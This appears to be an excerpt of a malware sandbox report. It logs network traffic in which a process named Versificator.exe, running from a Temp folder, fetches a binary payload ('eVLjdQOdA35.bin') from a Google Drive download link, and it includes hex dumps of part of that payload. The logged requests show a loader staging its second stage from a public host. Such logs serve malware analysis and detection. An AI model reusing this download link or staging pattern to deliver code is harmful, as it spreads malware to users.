                                                                                            Mar 10, 2025 11:24:35.736428022 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.736438036 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.736453056 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.736494064 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.739126921 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.739176989 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.739185095 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.739191055 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.739221096 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.739255905 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.744236946 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.744296074 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.744302988 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.744360924 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.744366884 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.744415045 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.750256062 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.750312090 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.750319004 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.750370026 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.754971981 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.755029917 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.755038023 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.755093098 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.759186983 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.759243011 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.759253025 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.759300947 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.763827085 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.763873100 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.763896942 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.763905048 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.763919115 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.763986111 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.769490957 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.769534111 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.769561052 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.769568920 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.769579887 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.769622087 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.773680925 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.773735046 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.777883053 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.777939081 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.777971983 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.778014898 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.778022051 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.778067112 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.783031940 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.783093929 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.783102036 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.783149958 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.786963940 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.787013054 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.787025928 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.787086964 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.791337013 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.791404963 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.795993090 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.796093941 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.796128035 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.796201944 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.796211004 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.796284914 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.798403025 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.798449993 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.798459053 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.798556089 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.798692942 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.798737049 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.802448988 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.802503109 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.802509069 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.802519083 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.802562952 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.809129953 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.809210062 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.809220076 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.809278965 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.811609030 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.811672926 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.812180042 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.812237024 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.821204901 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.821365118 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.821374893 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.821424007 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.821518898 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.821584940 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.821795940 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.821851015 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.825570107 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.825624943 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.825633049 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.825687885 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.830358982 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.830410004 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.830418110 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.830480099 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.834625959 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.834670067 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.834678888 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.834686995 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.834717035 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.834779024 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.839127064 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.839188099 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.839195967 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.839242935 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.842950106 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.843007088 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.843051910 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.843101978 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.847332001 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.847373962 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.847384930 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.847393990 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.847415924 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.847450018 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.851795912 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.851847887 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.855453968 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.855500937 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.855509043 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.855554104 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.855560064 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.855609894 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.859044075 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.859184027 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.859191895 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.859251976 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.982001066 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.982064009 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.005121946 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.005184889 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.005683899 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.005752087 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006170034 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006228924 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006319046 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006378889 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006431103 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006484032 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006531000 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006603956 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006663084 CET49693443192.168.2.7142.250.185.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 10, 2025 11:24:27.847306013 CET | 57609 | 53 | 192.168.2.7 | 1.1.1.1
Mar 10, 2025 11:24:27.854898930 CET | 53 | 57609 | 1.1.1.1 | 192.168.2.7
Mar 10, 2025 11:24:30.477838039 CET | 63208 | 53 | 192.168.2.7 | 1.1.1.1
Mar 10, 2025 11:24:30.485310078 CET | 53 | 63208 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 10, 2025 11:24:27.847306013 CET | 192.168.2.7 | 1.1.1.1 | 0xd292 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Mar 10, 2025 11:24:30.477838039 CET | 192.168.2.7 | 1.1.1.1 | 0x5b05 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 10, 2025 11:24:27.854898930 CET | 1.1.1.1 | 192.168.2.7 | 0xd292 | No error (0) | drive.google.com | | 216.58.212.142 | A (IP address) | IN (0x0001) | false
Mar 10, 2025 11:24:30.485310078 CET | 1.1.1.1 | 192.168.2.7 | 0x5b05 | No error (0) | drive.usercontent.google.com | | 142.250.185.97 | A (IP address) | IN (0x0001) | false
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49692 | 216.58.212.142 | 443 | 3016 | C:\Users\user\AppData\Local\Temp\Versificator.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 10:24:29 UTC | 216 | OUT | GET /uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
2025-03-10 10:24:30 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Mon, 10 Mar 2025 10:24:30 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-wcwKcP-VPAiNZZRXjM9d3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49693 | 142.250.185.97 | 443 | 3016 | C:\Users\user\AppData\Local\Temp\Versificator.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 10:24:32 UTC | 258 | OUT | GET /download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
2025-03-10 10:24:35 UTC | 5011 | IN | HTTP/1.1 200 OK
                                                                                            X-GUploader-UploadID: AKDAyIuadWe0Ogq6V0QhOE8YUhJNW6uFfmDKD-rlE2jITo_uTmBZD4vXWHd420HUsxa0DbtQ
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="eVLjdQOdA35.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 289856
                                                                                            Last-Modified: Sun, 09 Mar 2025 20:09:20 GMT
                                                                                            Date: Mon, 10 Mar 2025 10:24:35 GMT
                                                                                            Expires: Mon, 10 Mar 2025 10:24:35 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=zVyUvA==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2025-03-10 10:24:35 UTC5011INData Raw: 9c 5a 64 65 0a 8f 38 35 86 40 ca a9 cb c9 9b 1d 66 52 a8 99 7e 02 48 7e 67 0d 05 f5 8d f4 e8 97 42 e4 44 66 ea 92 21 08 1b 5d e5 ad b7 80 84 ca 90 8d ff 37 87 ec e5 7d 12 07 da 04 b3 20 ea 5e 1a 44 a6 e1 b1 20 6f 4c fd cc f2 87 54 50 59 82 63 55 7f 12 8d 01 a2 fb 1b c5 5a 84 3f 20 83 8c ae 15 3c 1d 59 50 a2 63 a3 bd 16 e0 8d d6 2f db 54 ff 85 ba 88 96 b8 8c 05 ab 50 38 ff 2b bf d7 fd 85 b7 f1 67 df 6e 11 42 ad 1b ad 69 4d 38 3f 76 8d 96 bb 9b 19 9b ec 40 9b 19 c4 6e f1 9f 7e 92 f3 c9 ae b7 57 bb 91 62 d0 6d d2 05 25 ac 23 35 df e7 9c dd c1 70 1b ce ab 97 38 89 23 21 87 21 91 71 b2 33 71 4c 87 64 02 f3 0e c7 54 72 e2 27 c3 43 4e d7 67 93 ff b9 8b b0 47 40 b4 41 78 6a fc 37 83 27 47 0e b5 75 2c 82 26 be e8 7d 3f b3 b8 3d ac 22 06 9e 5e e4 e8 fa 81 20 14 04
                                                                                            Data Ascii: Zde85@fR~H~gBDf!]7} ^D oLTPYcUZ? <YPc/TP8+gnBiM8?v@n~Wbm%#5p8#!!q3qLdTr'CNgG@Axj7'Gu,&}?="^
                                                                                            2025-03-10 10:24:35 UTC4672INData Raw: 08 67 e3 58 1b d3 ae 91 c9 aa 1c 18 72 42 82 5c ab 02 c2 6d a5 9a df fd 4f 22 c0 69 a1 cf 04 5b 7f db 75 c0 8a a3 d4 e5 19 40 d1 b5 95 21 7a ba dd 48 ad 29 c5 ab 0c d1 b0 61 98 8c b0 de 37 bd bd 50 30 f5 0b 58 11 3c 78 4d 9e 92 5d 6b 11 a9 03 ad 47 2c 77 0b b7 a6 a8 fa 25 4f 86 e1 4a 74 5b ac a1 8b 2b 41 9b 1f ee 71 7e 04 ff ac 10 97 3e d0 8f d2 44 1c c8 10 62 04 fc 3a 53 ef 92 3e bf f0 f4 76 88 5f 7a df bc f9 e6 7c d4 1d 81 79 21 c9 dd e6 49 33 69 6c d7 38 d9 19 6b d8 d9 4c 88 a5 61 97 9a e0 ae 8e 60 6c e9 8f 62 87 7a c6 ec 91 a7 b7 0e 24 5d 13 4d 8b d2 7a 8b 34 a5 86 2f 71 5c bc ad 58 28 34 7e 12 79 c3 24 b0 80 56 a8 dd 5f 2d 86 bf 5d 6e 67 58 7d 0d dd af 3a fb 1d 09 8d ce 1e a2 3c 75 7c 51 38 5a 3f 22 1b 3a 5f 9e d5 d4 ec 58 44 04 fc f3 d9 a9 bb 6d bd
                                                                                            Data Ascii: gXrB\mO"i[u@!zH)a7P0X<xM]kG,w%OJt[+Aq~>Db:S>v_z|y!I3il8kLa`lbz$]Mz4/q\X(4~y$V_-]ngX}:<u|Q8Z?":_XDm
                                                                                            2025-03-10 10:24:35 UTC1326INData Raw: 6b 48 c5 17 b4 57 6d 44 5c 50 24 2c a9 a0 f4 fc 88 5e 7d 8b 94 4e a4 45 94 19 bc 94 2a 8a 14 b0 5f dd c9 7a 5a a7 c1 eb f4 78 d4 7b ef 62 6e 78 9b d0 b7 21 ee 37 dd ec a7 40 ca a9 7c 2e f5 b1 ce 0b ba 32 f5 49 8d 59 ff 0b a2 7b 89 3b dc 45 71 12 34 c6 4a c3 b8 43 9a 65 40 a7 81 eb ad b2 07 e6 bc 92 b5 28 6a 63 60 c7 9a 45 ed d9 2f ef 4c be fc c3 cd 4a d4 86 f4 36 14 e2 44 22 ff 76 c6 9f b0 8c 68 ed 6a fe 61 9d 66 23 fe 5e 71 15 c2 4d 43 ec 24 14 ef 88 ef e0 b1 01 0b 2f d7 92 47 74 95 47 62 a4 50 10 79 8b 4f 0a bb d5 23 0a 28 0c 64 c9 78 ae f3 d2 3b e5 8f 3f 45 4b a1 d4 c5 cd 8d ac cf 7e 8b 8b 8b a2 a1 f9 08 09 10 6f 9d f0 6f 81 79 cf cb 79 c0 69 24 88 97 3b 8b 90 51 11 34 48 14 0b 43 d8 f3 a3 93 ea 68 1b 06 10 f7 8c 67 52 b7 13 f0 d4 87 f4 bc cb 1f ab 4a
                                                                                            Data Ascii: kHWmD\P$,^}NE*_zZx{bnx!7@|.2IY{;Eq4JCe@(jc`E/LJ6D"vhjaf#^qMC$/GtGbPyO#(dx;?EK~ooyyi$;Q4HChgRJ
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: a2 ff 0d fe ae db 35 7d a8 3c 8a 85 bc e2 1c 93 88 ef a1 9a 11 b1 e3 76 54 9d 12 e9 2c 21 bd 1f f4 01 7f 8f 7c 26 d1 ff d4 63 12 19 0a 8a a5 52 c3 1c 2a 84 6c f6 91 46 06 34 ac 27 da ee 84 ff 15 9b c6 1e 40 b4 5f c7 b5 a9 ed 77 f0 5c b4 83 2e d3 09 22 f9 7b 59 c4 49 47 a4 2e 20 41 12 25 c1 b4 0f a9 eb d1 df 13 08 48 ba 9c 58 a0 42 71 84 22 d6 93 cf e3 b9 66 0f 3c 27 6b 34 19 50 67 2e f9 27 92 1b 80 05 fe a7 b8 ce 78 75 8e 63 9f 96 76 b1 89 e9 b2 81 1a cd 1a cd 26 c6 68 64 99 9a 68 8a 39 fd a8 13 b1 1b 02 b1 ed c9 f4 63 f5 ac a8 11 74 47 b7 80 11 8c 57 a6 85 22 6b ba 1e 9e 39 80 75 9f e4 f5 55 3c f4 93 d7 7d 59 59 27 dc 7e 8b d5 a3 f8 e3 71 76 c2 ba 94 98 c5 8b f5 28 63 e0 f6 76 4d 99 c5 2c 02 eb e1 e2 d7 60 ee f7 1e d1 0d 80 b0 0d d7 6e 41 8e f8 b3 c8 eb
                                                                                            Data Ascii: 5}<vT,!|&cR*lF4'@_w\."{YIG. A%HXBq"f<'k4Pg.'xucv&hdh9ctGW"k9uU<}YY'~qv(cvM,`nA
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 6b 5c 1b c4 fb a5 c4 be b3 4f 8d b9 8e 8b 78 c7 bc 30 b4 ad 76 4f 11 b1 84 f0 28 10 24 2e 6c 30 48 31 4b ed b4 bd af 86 a9 3a 31 31 7d 3e 70 4e 13 e7 27 23 31 4d c5 9c c3 3e f5 f8 a3 b6 cb 8d ae d3 a6 5b 18 32 c6 c4 91 91 19 f6 82 e5 62 9a 90 67 e4 33 f1 44 cc 32 96 cd dc ce 59 94 73 38 ea b8 e9 5e 3b a3 15 8c a3 ef 17 81 9c 66 3a a4 d4 00 9d 5a c0 62 f8 43 bb e0 dc b4 6a 9d 9f 7f df 6b a2 71 25 ef 58 fa a9 bf 33 76 55 fc fe 29 2e a1 3e 0c 39 5f 59 f1 79 1f 6b 6c 08 f6 52 6b c6 70 ec d0 d2 33 3b e2 c5 9c 1a 38 28 ec 75 ce d9 c7 b1 e3 2f fe b4 26 11 6e 1a 8f e3 08 8a 98 2b c8 6a a6 ed 16 13 57 97 c7 ce ab 87 d8 a4 ab cb d7 24 b2 b3 4a 3f 53 9e fb b1 e5 fa f0 64 44 b1 cc 69 83 22 70 7b aa f6 50 c9 2e 22 7f 33 2d 15 76 c1 40 c3 96 de dc 66 f4 4d 31 c5 5d 43
                                                                                            Data Ascii: k\Ox0vO($.l0H1K:11}>pN'#1M>[2bg3D2Ys8^;f:ZbCjkq%X3vU).>9_YyklRkp3;8(u/&n+jW$J?SdDi"p{P."3-v@fM1]C
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 30 9a 3e f9 1c 67 73 d1 19 f6 86 f9 6c 5d 75 61 69 9b 69 f0 a4 80 5f b8 7c 7a 5e 6b de 4e c6 d8 ea 7a 46 7c 97 48 38 0b f3 58 ab cb fd 1d 2a df 85 51 70 e3 d8 00 9a 39 39 ad 2a 9e 00 d2 62 9e a7 bb d2 c3 27 e0 e2 dc 07 6d 2b e7 bc 8f 0c 23 14 8c 34 9e 6b 8a 27 a3 a6 02 5d a6 5b f1 91 15 cc 00 f5 cc b0 a1 cd 74 ee 6e 50 db 97 b4 15 89 cc 4c e2 3f 50 40 85 e7 6e d5 71 02 e1 67 9f f3 38 06 4a 4b c6 aa 12 74 47 72 95 6b 23 2a f7 71 a0 90 2b 2a 01 57 81 03 14 4d 58 42 50 da 8e 93 cc 50 b6 4c f5 f7 e4 5c e4 9a 23 63 3c 2e 01 6b d2 b6 8b 03 5b 72 f7 89 af 45 da 50 fa 04 fc 34 79 33 14 d6 7a ea c3 e2 60 23 54 6e 14 a9 e5 b5 cf 3a c2 90 db 0d f0 f9 56 c9 b5 5a d9 90 fd d6 f4 77 1c fb 55 b7 00 e9 ea 4f 68 e6 82 59 a8 e3 67 da dc 35 17 ac f0 c2 2a 1d 63 cb cc 41 dc
                                                                                            Data Ascii: 0>gsl]uaii_|z^kNzF|H8X*Qp99*b'm+#4k'][tnPL?P@nqg8JKtGrk#*q+*WMXBPPL\#c<.k[rEP4y3z`#Tn:VZwUOhYg5*cA
